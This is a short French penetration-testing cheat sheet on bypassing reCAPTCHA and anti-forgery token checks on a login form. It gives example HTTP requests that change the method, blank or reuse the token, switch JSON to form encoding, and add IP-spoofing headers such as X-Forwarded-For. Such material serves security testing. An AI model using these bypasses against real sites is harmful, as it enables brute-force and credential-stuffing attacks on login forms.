🤖Captcha
Google reCAPTCHA bypass
Changer la methode HTTP
Exemple:
POST / HTTP 1.1
Host: target.com
...
... Failed
...
_RequestVerificationToken=XXXXXXX&_Username=...&_Password=...
GET / HTTP 1.1
Host: target.com
...
... OK
...
_RequestVerificationToken=XXXXXXX&_Username=...&_Password=...
Supprimer la valeur du parametre "token"
Exemple:
_RequestVerificationToken=&_Username=...&_Password=...
Utiliser un token déjà utilisé
Exemple:
_RequestVerificationToken=ABCDEFGHIJK&_Username=...&_Password=... OK
_RequestVerificationToken=ABCDEFGHIJK&_Username=...&_Password=... OK
Convertir le format de la requête
Exemple:
{"_RequestVerificationToken":"XXXXXXXXXX","_Username":"...","_Password":"..."}
en
_RequestVerificationToken=XXXXXXXXXX&_Username=...&_Password=...
Utiliser un header custom
X-Custom-Ip-Authorization:
X-Original-URL:
X-Rewrite-URL:
X-Originating-IP:
X-Forwarded-For:
X-Remote-IP:
X-Client-IP:
X-Host:
X-Forwarded-Host:
Dernière mise à jour
Cet article vous a-t-il été utile ?